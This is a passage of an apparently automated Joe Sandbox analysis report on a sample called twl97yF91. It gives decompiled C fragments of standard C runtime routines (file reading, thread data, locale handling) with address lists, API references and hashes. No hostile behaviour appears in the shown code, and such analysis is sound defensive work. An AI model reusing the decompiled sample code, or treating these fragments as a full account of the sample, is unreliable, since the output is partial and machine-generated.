                                                                                                                                                                                                          										} else {
                                                                                                                                                                                                          											E004103F1(_t120, _t123, _t125, _v12, _v8,  *_t133, _t131);
                                                                                                                                                                                                          											 *(_t133 + 4) =  *(_t133 + 4) - _t131;
                                                                                                                                                                                                          											 *_t133 =  *_t133 + _t131;
                                                                                                                                                                                                          											_v12 = _v12 + _t131;
                                                                                                                                                                                                          											_t120 = _t120 - _t131;
                                                                                                                                                                                                          											_t134 = _t134 + 0x10;
                                                                                                                                                                                                          											_v8 = _v8 - _t131;
                                                                                                                                                                                                          											_t131 = _v20;
                                                                                                                                                                                                          										}
                                                                                                                                                                                                          										L39:
                                                                                                                                                                                                          										__eflags = _t120;
                                                                                                                                                                                                          									} while (_t120 != 0);
                                                                                                                                                                                                          									goto L40;
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						_t118 = _t90 | 0xffffffff;
                                                                                                                                                                                                          						_t90 = _t118 / _a12;
                                                                                                                                                                                                          						_t125 = _t118 % _a12;
                                                                                                                                                                                                          						__eflags = _a16 - _t90;
                                                                                                                                                                                                          						if(_a16 <= _t90) {
                                                                                                                                                                                                          							goto L13;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						goto L9;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					L3:
                                                                                                                                                                                                          					_t92 = E0040BFC1(_t138);
                                                                                                                                                                                                          					_push(_t131);
                                                                                                                                                                                                          					_push(_t131);
                                                                                                                                                                                                          					_push(_t131);
                                                                                                                                                                                                          					_push(_t131);
                                                                                                                                                                                                          					 *_t92 = 0x16;
                                                                                                                                                                                                          					_push(_t131);
                                                                                                                                                                                                          					goto L4;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          			}





























                                                                                                                                                                                                          0x0040bcc2
                                                                                                                                                                                                          0x0040bcca
                                                                                                                                                                                                          0x0040bcce
                                                                                                                                                                                                          0x0040bcd3
                                                                                                                                                                                                          0x0040bcd5
                                                                                                                                                                                                          0x0040bcd8
                                                                                                                                                                                                          0x0040bcde
                                                                                                                                                                                                          0x0040bd01
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0040bce5
                                                                                                                                                                                                          0x0040bce5
                                                                                                                                                                                                          0x0040bce7
                                                                                                                                                                                                          0x0040bd08
                                                                                                                                                                                                          0x0040bd0b
                                                                                                                                                                                                          0x0040bd0d
                                                                                                                                                                                                          0x0040bd1c
                                                                                                                                                                                                          0x0040bd1c
                                                                                                                                                                                                          0x0040bd1f
                                                                                                                                                                                                          0x0040bd24
                                                                                                                                                                                                          0x0040bd29
                                                                                                                                                                                                          0x0040bd29
                                                                                                                                                                                                          0x0040bd2c
                                                                                                                                                                                                          0x0040bd2e
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0040bd30
                                                                                                                                                                                                          0x0040bd30
                                                                                                                                                                                                          0x0040bd35
                                                                                                                                                                                                          0x0040bd38
                                                                                                                                                                                                          0x0040bd3b
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0040bd3d
                                                                                                                                                                                                          0x0040bd40
                                                                                                                                                                                                          0x0040bd44
                                                                                                                                                                                                          0x0040bd4b
                                                                                                                                                                                                          0x0040bd4e
                                                                                                                                                                                                          0x0040bd50
                                                                                                                                                                                                          0x0040bd5a
                                                                                                                                                                                                          0x0040bd52
                                                                                                                                                                                                          0x0040bd55
                                                                                                                                                                                                          0x0040bd55
                                                                                                                                                                                                          0x0040bd61
                                                                                                                                                                                                          0x0040bd63
                                                                                                                                                                                                          0x0040be53
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0040bd69
                                                                                                                                                                                                          0x0040bd69
                                                                                                                                                                                                          0x0040bd69
                                                                                                                                                                                                          0x0040bd70
                                                                                                                                                                                                          0x0040bdb6
                                                                                                                                                                                                          0x0040bdb6
                                                                                                                                                                                                          0x0040bdb9
                                                                                                                                                                                                          0x0040be24
                                                                                                                                                                                                          0x0040be2a
                                                                                                                                                                                                          0x0040be2d
                                                                                                                                                                                                          0x0040beb8
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0040bebe
                                                                                                                                                                                                          0x0040be33
                                                                                                                                                                                                          0x0040be37
                                                                                                                                                                                                          0x0040be87
                                                                                                                                                                                                          0x0040be87
                                                                                                                                                                                                          0x0040be8b
                                                                                                                                                                                                          0x0040be95
                                                                                                                                                                                                          0x0040be9a
                                                                                                                                                                                                          0x0040be9a
                                                                                                                                                                                                          0x0040bea2
                                                                                                                                                                                                          0x0040beaa
                                                                                                                                                                                                          0x0040beab
                                                                                                                                                                                                          0x0040beac
                                                                                                                                                                                                          0x0040bead
                                                                                                                                                                                                          0x0040beae
                                                                                                                                                                                                          0x0040bcf9
                                                                                                                                                                                                          0x0040bcf9
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0040bcfe
                                                                                                                                                                                                          0x0040be39
                                                                                                                                                                                                          0x0040be3c
                                                                                                                                                                                                          0x0040be3f
                                                                                                                                                                                                          0x0040be44
                                                                                                                                                                                                          0x0040be45
                                                                                                                                                                                                          0x0040be45
                                                                                                                                                                                                          0x0040be45
                                                                                                                                                                                                          0x0040be48
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0040be48
                                                                                                                                                                                                          0x0040bdbb
                                                                                                                                                                                                          0x0040bdbf
                                                                                                                                                                                                          0x0040bde0
                                                                                                                                                                                                          0x0040bde5
                                                                                                                                                                                                          0x0040bde7
                                                                                                                                                                                                          0x0040bde9
                                                                                                                                                                                                          0x0040bde9
                                                                                                                                                                                                          0x0040bdc1
                                                                                                                                                                                                          0x0040bdc8
                                                                                                                                                                                                          0x0040bdca
                                                                                                                                                                                                          0x0040bdd7
                                                                                                                                                                                                          0x0040bdd7
                                                                                                                                                                                                          0x0040bdd7
                                                                                                                                                                                                          0x0040bdda
                                                                                                                                                                                                          0x0040bdcc
                                                                                                                                                                                                          0x0040bdce
                                                                                                                                                                                                          0x0040bdd1
                                                                                                                                                                                                          0x0040bdd1
                                                                                                                                                                                                          0x0040bddc
                                                                                                                                                                                                          0x0040bddc
                                                                                                                                                                                                          0x0040bdeb
                                                                                                                                                                                                          0x0040bdee
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0040bdf4
                                                                                                                                                                                                          0x0040bdf4
                                                                                                                                                                                                          0x0040bdf5
                                                                                                                                                                                                          0x0040bdf9
                                                                                                                                                                                                          0x0040bdfe
                                                                                                                                                                                                          0x0040bdff
                                                                                                                                                                                                          0x0040be00
                                                                                                                                                                                                          0x0040be05
                                                                                                                                                                                                          0x0040be08
                                                                                                                                                                                                          0x0040be0a
                                                                                                                                                                                                          0x0040bec6
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0040bec6
                                                                                                                                                                                                          0x0040be10
                                                                                                                                                                                                          0x0040be13
                                                                                                                                                                                                          0x0040beb4
                                                                                                                                                                                                          0x0040beb4
                                                                                                                                                                                                          0x0040beb4
                                                                                                                                                                                                          0x0040beb4
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0040beb4
                                                                                                                                                                                                          0x0040be19
                                                                                                                                                                                                          0x0040be1c
                                                                                                                                                                                                          0x0040be1e
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0040be1e
                                                                                                                                                                                                          0x0040bdee
                                                                                                                                                                                                          0x0040bd72
                                                                                                                                                                                                          0x0040bd75
                                                                                                                                                                                                          0x0040bd77
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0040bd79
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0040bd7f
                                                                                                                                                                                                          0x0040bd81
                                                                                                                                                                                                          0x0040bd83
                                                                                                                                                                                                          0x0040bd85
                                                                                                                                                                                                          0x0040bd85
                                                                                                                                                                                                          0x0040bd87
                                                                                                                                                                                                          0x0040bd8a
                                                                                                                                                                                                          0x0040be5b
                                                                                                                                                                                                          0x0040be5d
                                                                                                                                                                                                          0x0040be61
                                                                                                                                                                                                          0x0040be6a
                                                                                                                                                                                                          0x0040be6f
                                                                                                                                                                                                          0x0040be6f
                                                                                                                                                                                                          0x0040be72
                                                                                                                                                                                                          0x0040be77
                                                                                                                                                                                                          0x0040be78
                                                                                                                                                                                                          0x0040be79
                                                                                                                                                                                                          0x0040be7a
                                                                                                                                                                                                          0x0040be7b
                                                                                                                                                                                                          0x0040be81
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0040bd90
                                                                                                                                                                                                          0x0040bd99
                                                                                                                                                                                                          0x0040bd9e
                                                                                                                                                                                                          0x0040bda1
                                                                                                                                                                                                          0x0040bda3
                                                                                                                                                                                                          0x0040bda6
                                                                                                                                                                                                          0x0040bda8
                                                                                                                                                                                                          0x0040bdab
                                                                                                                                                                                                          0x0040bdae
                                                                                                                                                                                                          0x0040bdae
                                                                                                                                                                                                          0x0040be4b
                                                                                                                                                                                                          0x0040be4b
                                                                                                                                                                                                          0x0040be4b
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0040bd69
                                                                                                                                                                                                          0x0040bd63
                                                                                                                                                                                                          0x0040bd2e
                                                                                                                                                                                                          0x0040bd0f
                                                                                                                                                                                                          0x0040bd14
                                                                                                                                                                                                          0x0040bd14
                                                                                                                                                                                                          0x0040bd17
                                                                                                                                                                                                          0x0040bd1a
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0040bd1a
                                                                                                                                                                                                          0x0040bce9
                                                                                                                                                                                                          0x0040bce9
                                                                                                                                                                                                          0x0040bcee
                                                                                                                                                                                                          0x0040bcef
                                                                                                                                                                                                          0x0040bcf0
                                                                                                                                                                                                          0x0040bcf1
                                                                                                                                                                                                          0x0040bcf2
                                                                                                                                                                                                          0x0040bcf8
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0040bcf8

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000001.00000002.320815814.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000001.00000002.320815814.0000000000426000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000001.00000002.320815814.000000000044D000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_twl97yF91.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: _memset$__filbuf__fileno__getptd_noexit__read_memcpy_s
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3886058894-0
                                                                                                                                                                                                          • Opcode ID: c8cdba87b669e5a45588b0eb276f39e335abb1b1e80ab099951c299220f7b7ba
                                                                                                                                                                                                          • Instruction ID: 0234425abcb0213f77efd30778ac7634d7a408156a07f93f58cd91f86a00e979
                                                                                                                                                                                                          • Opcode Fuzzy Hash: c8cdba87b669e5a45588b0eb276f39e335abb1b1e80ab099951c299220f7b7ba
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1E519031A00605ABCB209F69C844A9FBB75EF41324F24863BF825B22D1D7799E51CBDD
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000001.00000002.321441344.0000000002CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CB0000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_2cb0000_twl97yF91.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: __fileno$__getptd_noexit__lock_file
                                                                                                                                                                                                          • String ID: 'B
                                                                                                                                                                                                          • API String ID: 3755561058-2787509829
                                                                                                                                                                                                          • Opcode ID: 2b0b2601706cdb465d4c9eff24f73974ea9fb0f2dbbf8fc2cbf9e4943b65d960
                                                                                                                                                                                                          • Instruction ID: e9f5648307d5eb11c25432d8d4ed4fb8796e32f7d6dd83879953aa3e4883119d
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2b0b2601706cdb465d4c9eff24f73974ea9fb0f2dbbf8fc2cbf9e4943b65d960
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8F012B73900A145AD2236B786C416FD73A19ECEB72F65470AE0709B2D0EB28C742ED55
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • __getptd.LIBCMT ref: 02CC49AB
                                                                                                                                                                                                            • Part of subcall function 02CC099C: __getptd_noexit.LIBCMT ref: 02CC099F
                                                                                                                                                                                                            • Part of subcall function 02CC099C: __amsg_exit.LIBCMT ref: 02CC09AC
                                                                                                                                                                                                          • __getptd.LIBCMT ref: 02CC49C2
                                                                                                                                                                                                          • __amsg_exit.LIBCMT ref: 02CC49D0
                                                                                                                                                                                                          • __lock.LIBCMT ref: 02CC49E0
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000001.00000002.321441344.0000000002CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CB0000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_2cb0000_twl97yF91.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                                                                                                                                                                                                          • String ID: @.B
                                                                                                                                                                                                          • API String ID: 3521780317-470711618
                                                                                                                                                                                                          • Opcode ID: f43c5434038c0e2b3130a40ea1e7b9b854db78837d0c16722a3a572f716d4dbb
                                                                                                                                                                                                          • Instruction ID: 5854e92c216c6ff1dc6fe3b9ff4584612a5e9b9e8f34f4b373f3ae62281340e2
                                                                                                                                                                                                          • Opcode Fuzzy Hash: f43c5434038c0e2b3130a40ea1e7b9b854db78837d0c16722a3a572f716d4dbb
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 39F02431A40B20DBDB3DFBB088007D973A57F00B21FA0855EC444A72D0CB70A901EF55
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          C-Code - Quality: 90%
                                                                                                                                                                                                          			E00414738(void* __ebx, void* __edx, intOrPtr __edi, void* __esi, void* __eflags) {
                                                                                                                                                                                                          				signed int _t13;
                                                                                                                                                                                                          				intOrPtr _t28;
                                                                                                                                                                                                          				void* _t29;
                                                                                                                                                                                                          				void* _t30;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_t30 = __eflags;
                                                                                                                                                                                                          				_t26 = __edi;
                                                                                                                                                                                                          				_t25 = __edx;
                                                                                                                                                                                                          				_t22 = __ebx;
                                                                                                                                                                                                          				_push(0xc);
                                                                                                                                                                                                          				_push(0x4214d0);
                                                                                                                                                                                                          				E0040E1D8(__ebx, __edi, __esi);
                                                                                                                                                                                                          				_t28 = E00410735(__ebx, __edx, __edi, _t30);
                                                                                                                                                                                                          				_t13 =  *0x422e34; // 0xfffffffe
                                                                                                                                                                                                          				if(( *(_t28 + 0x70) & _t13) == 0) {
                                                                                                                                                                                                          					L6:
                                                                                                                                                                                                          					E0040D6E0(_t22, 0xc);
                                                                                                                                                                                                          					 *(_t29 - 4) =  *(_t29 - 4) & 0x00000000;
                                                                                                                                                                                                          					_t8 = _t28 + 0x6c; // 0x6c
                                                                                                                                                                                                          					_t26 =  *0x422f18; // 0x422e40
                                                                                                                                                                                                          					 *((intOrPtr*)(_t29 - 0x1c)) = E004146FA(_t8, _t26);
                                                                                                                                                                                                          					 *(_t29 - 4) = 0xfffffffe;
                                                                                                                                                                                                          					E004147A2();
                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                          					_t32 =  *((intOrPtr*)(_t28 + 0x6c));
                                                                                                                                                                                                          					if( *((intOrPtr*)(_t28 + 0x6c)) == 0) {
                                                                                                                                                                                                          						goto L6;
                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                          						_t28 =  *((intOrPtr*)(E00410735(_t22, __edx, _t26, _t32) + 0x6c));
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				if(_t28 == 0) {
                                                                                                                                                                                                          					E0040E79A(_t25, _t26, 0x20);
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				return E0040E21D(_t28);
                                                                                                                                                                                                          			}







                                                                                                                                                                                                          0x00414738
                                                                                                                                                                                                          0x00414738
                                                                                                                                                                                                          0x00414738
                                                                                                                                                                                                          0x00414738
                                                                                                                                                                                                          0x00414738
                                                                                                                                                                                                          0x0041473a
                                                                                                                                                                                                          0x0041473f
                                                                                                                                                                                                          0x00414749
                                                                                                                                                                                                          0x0041474b
                                                                                                                                                                                                          0x00414753
                                                                                                                                                                                                          0x00414777
                                                                                                                                                                                                          0x00414779
                                                                                                                                                                                                          0x0041477f
                                                                                                                                                                                                          0x00414783
                                                                                                                                                                                                          0x00414786
                                                                                                                                                                                                          0x00414791
                                                                                                                                                                                                          0x00414794
                                                                                                                                                                                                          0x0041479b
                                                                                                                                                                                                          0x00414755
                                                                                                                                                                                                          0x00414755
                                                                                                                                                                                                          0x00414759
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0041475b
                                                                                                                                                                                                          0x00414760
                                                                                                                                                                                                          0x00414760
                                                                                                                                                                                                          0x00414759
                                                                                                                                                                                                          0x00414765
                                                                                                                                                                                                          0x00414769
                                                                                                                                                                                                          0x0041476e
                                                                                                                                                                                                          0x00414776

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • __getptd.LIBCMT ref: 00414744
                                                                                                                                                                                                            • Part of subcall function 00410735: __getptd_noexit.LIBCMT ref: 00410738
                                                                                                                                                                                                            • Part of subcall function 00410735: __amsg_exit.LIBCMT ref: 00410745
                                                                                                                                                                                                          • __getptd.LIBCMT ref: 0041475B
                                                                                                                                                                                                          • __amsg_exit.LIBCMT ref: 00414769
                                                                                                                                                                                                          • __lock.LIBCMT ref: 00414779
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000001.00000002.320815814.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000001.00000002.320815814.0000000000426000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000001.00000002.320815814.000000000044D000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_twl97yF91.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                                                                                                                                                                                                          • String ID: @.B
                                                                                                                                                                                                          • API String ID: 3521780317-470711618
                                                                                                                                                                                                          • Opcode ID: f43c5434038c0e2b3130a40ea1e7b9b854db78837d0c16722a3a572f716d4dbb
                                                                                                                                                                                                          • Instruction ID: 91aff3cf2d6bbea4e2ea5d49e8e08bf0f41c3eb50374f8394f27d7b6c467aa53
                                                                                                                                                                                                          • Opcode Fuzzy Hash: f43c5434038c0e2b3130a40ea1e7b9b854db78837d0c16722a3a572f716d4dbb
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 60F09631A407009BE720BB66850678D73A06F81719F91456FE4646B2D1CB7C6981CA5D
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • ___addlocaleref.LIBCMT ref: 02CC4973
                                                                                                                                                                                                          • ___removelocaleref.LIBCMT ref: 02CC497E
                                                                                                                                                                                                          • ___freetlocinfo.LIBCMT ref: 02CC4992
                                                                                                                                                                                                            • Part of subcall function 02CC46F0: ___free_lconv_mon.LIBCMT ref: 02CC4736
                                                                                                                                                                                                            • Part of subcall function 02CC46F0: ___free_lconv_num.LIBCMT ref: 02CC4757
                                                                                                                                                                                                            • Part of subcall function 02CC46F0: ___free_lc_time.LIBCMT ref: 02CC47DC
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000001.00000002.321441344.0000000002CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CB0000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_2cb0000_twl97yF91.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ___addlocaleref___free_lc_time___free_lconv_mon___free_lconv_num___freetlocinfo___removelocaleref
                                                                                                                                                                                                          • String ID: @.B$@.B
                                                                                                                                                                                                          • API String ID: 4212647719-183327057
                                                                                                                                                                                                          • Opcode ID: 3857329619949c293296419ec2be8f51648e9d3bf58d3a63f1cc8ec60b1035b6
                                                                                                                                                                                                          • Instruction ID: 022614c4773af6e6237063324c9698d488f7a062322c04ccec85624b1a0adf1b
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3857329619949c293296419ec2be8f51648e9d3bf58d3a63f1cc8ec60b1035b6
                                                                                                                                                                                                          • Instruction Fuzzy Hash: B6E02632521A3105CA3D3B1C783036A929E2FE2316B3B912EE84CE7044DB244A80D4A4
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          C-Code - Quality: 77%
                                                                                                                                                                                                          			E0040C73D(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
                                                                                                                                                                                                          				intOrPtr _v8;
                                                                                                                                                                                                          				void* _t16;
                                                                                                                                                                                                          				void* _t17;
                                                                                                                                                                                                          				intOrPtr _t19;
                                                                                                                                                                                                          				void* _t21;
                                                                                                                                                                                                          				signed int _t22;
                                                                                                                                                                                                          				intOrPtr* _t27;
                                                                                                                                                                                                          				intOrPtr _t39;
                                                                                                                                                                                                          				intOrPtr _t40;
                                                                                                                                                                                                          				intOrPtr _t50;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_t37 = __edx;
                                                                                                                                                                                                          				_push(8);
                                                                                                                                                                                                          				_push(0x421140);
                                                                                                                                                                                                          				E0040E1D8(__ebx, __edi, __esi);
                                                                                                                                                                                                          				_t39 = _a4;
                                                                                                                                                                                                          				_t50 = _t39;
                                                                                                                                                                                                          				_t51 = _t50 != 0;
                                                                                                                                                                                                          				if(_t50 != 0) {
                                                                                                                                                                                                          					E0040FB29(_t39);
                                                                                                                                                                                                          					_v8 = 0;
                                                                                                                                                                                                          					 *(_t39 + 0xc) =  *(_t39 + 0xc) & 0xffffffcf;
                                                                                                                                                                                                          					_t16 = E0040FA20(__edx, _t39, _t39);
                                                                                                                                                                                                          					__eflags = _t16 - 0xffffffff;
                                                                                                                                                                                                          					if(_t16 == 0xffffffff) {
                                                                                                                                                                                                          						L6:
                                                                                                                                                                                                          						_t17 = 0x4227e0;
                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                          						_t21 = E0040FA20(__edx, _t39, _t39);
                                                                                                                                                                                                          						__eflags = _t21 - 0xfffffffe;
                                                                                                                                                                                                          						if(_t21 == 0xfffffffe) {
                                                                                                                                                                                                          							goto L6;
                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                          							_t22 = E0040FA20(__edx, _t39, _t39);
                                                                                                                                                                                                          							_t17 = ((E0040FA20(_t37, _t39, _t39) & 0x0000001f) << 6) +  *((intOrPtr*)(0x423f60 + (_t22 >> 5) * 4));
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					_t9 = _t17 + 4; // 0xa80
                                                                                                                                                                                                          					 *(_t17 + 4) =  *_t9 & 0x000000fd;
                                                                                                                                                                                                          					_v8 = 0xfffffffe;
                                                                                                                                                                                                          					E0040C735(_t39);
                                                                                                                                                                                                          					_t19 = 0;
                                                                                                                                                                                                          					__eflags = 0;
                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                          					_t27 = E0040BFC1(_t51);
                                                                                                                                                                                                          					_t40 = 0x16;
                                                                                                                                                                                                          					 *_t27 = _t40;
                                                                                                                                                                                                          					_push(0);
                                                                                                                                                                                                          					_push(0);
                                                                                                                                                                                                          					_push(0);
                                                                                                                                                                                                          					_push(0);
                                                                                                                                                                                                          					_push(0);
                                                                                                                                                                                                          					E0040E744(__edx, _t40, 0);
                                                                                                                                                                                                          					_t19 = _t40;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				return E0040E21D(_t19);
                                                                                                                                                                                                          			}













                                                                                                                                                                                                          0x0040c73d
                                                                                                                                                                                                          0x0040c690
                                                                                                                                                                                                          0x0040c692
                                                                                                                                                                                                          0x0040c697
                                                                                                                                                                                                          0x0040c69e
                                                                                                                                                                                                          0x0040c6a3
                                                                                                                                                                                                          0x0040c6a8
                                                                                                                                                                                                          0x0040c6aa
                                                                                                                                                                                                          0x0040c6c8
                                                                                                                                                                                                          0x0040c6ce
                                                                                                                                                                                                          0x0040c6d1
                                                                                                                                                                                                          0x0040c6d6
                                                                                                                                                                                                          0x0040c6dc
                                                                                                                                                                                                          0x0040c6df
                                                                                                                                                                                                          0x0040c70f
                                                                                                                                                                                                          0x0040c70f
                                                                                                                                                                                                          0x0040c6e1
                                                                                                                                                                                                          0x0040c6e2
                                                                                                                                                                                                          0x0040c6e8
                                                                                                                                                                                                          0x0040c6eb
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0040c6ed
                                                                                                                                                                                                          0x0040c6ee
                                                                                                                                                                                                          0x0040c70b
                                                                                                                                                                                                          0x0040c70b
                                                                                                                                                                                                          0x0040c6eb
                                                                                                                                                                                                          0x0040c714
                                                                                                                                                                                                          0x0040c71b
                                                                                                                                                                                                          0x0040c71e
                                                                                                                                                                                                          0x0040c725
                                                                                                                                                                                                          0x0040c72a
                                                                                                                                                                                                          0x0040c72a
                                                                                                                                                                                                          0x0040c6ac
                                                                                                                                                                                                          0x0040c6ac
                                                                                                                                                                                                          0x0040c6b3
                                                                                                                                                                                                          0x0040c6b4
                                                                                                                                                                                                          0x0040c6b6
                                                                                                                                                                                                          0x0040c6b7
                                                                                                                                                                                                          0x0040c6b8
                                                                                                                                                                                                          0x0040c6b9
                                                                                                                                                                                                          0x0040c6ba
                                                                                                                                                                                                          0x0040c6bb
                                                                                                                                                                                                          0x0040c6c3
                                                                                                                                                                                                          0x0040c6c3
                                                                                                                                                                                                          0x0040c731

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • __lock_file.LIBCMT ref: 0040C6C8
                                                                                                                                                                                                          • __fileno.LIBCMT ref: 0040C6D6
                                                                                                                                                                                                          • __fileno.LIBCMT ref: 0040C6E2
                                                                                                                                                                                                          • __fileno.LIBCMT ref: 0040C6EE
                                                                                                                                                                                                          • __fileno.LIBCMT ref: 0040C6FE
                                                                                                                                                                                                            • Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1
                                                                                                                                                                                                            • Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000001.00000002.320815814.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000001.00000002.320815814.0000000000426000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000001.00000002.320815814.000000000044D000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_twl97yF91.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: __fileno$__decode_pointer__getptd_noexit__lock_file
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2805327698-0
                                                                                                                                                                                                          • Opcode ID: 2b0b2601706cdb465d4c9eff24f73974ea9fb0f2dbbf8fc2cbf9e4943b65d960
                                                                                                                                                                                                          • Instruction ID: db056c5abb1484b678344f3d998e50672bc49cccd6cfe868de5707b4f3f6250f
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2b0b2601706cdb465d4c9eff24f73974ea9fb0f2dbbf8fc2cbf9e4943b65d960
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1A01253231451096C261ABBE5CC246E76A0DE81734726877FF024BB1D2DB3C99429E9D
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • __getptd.LIBCMT ref: 02CC423F
                                                                                                                                                                                                            • Part of subcall function 02CC099C: __getptd_noexit.LIBCMT ref: 02CC099F
                                                                                                                                                                                                            • Part of subcall function 02CC099C: __amsg_exit.LIBCMT ref: 02CC09AC
                                                                                                                                                                                                          • __amsg_exit.LIBCMT ref: 02CC425F
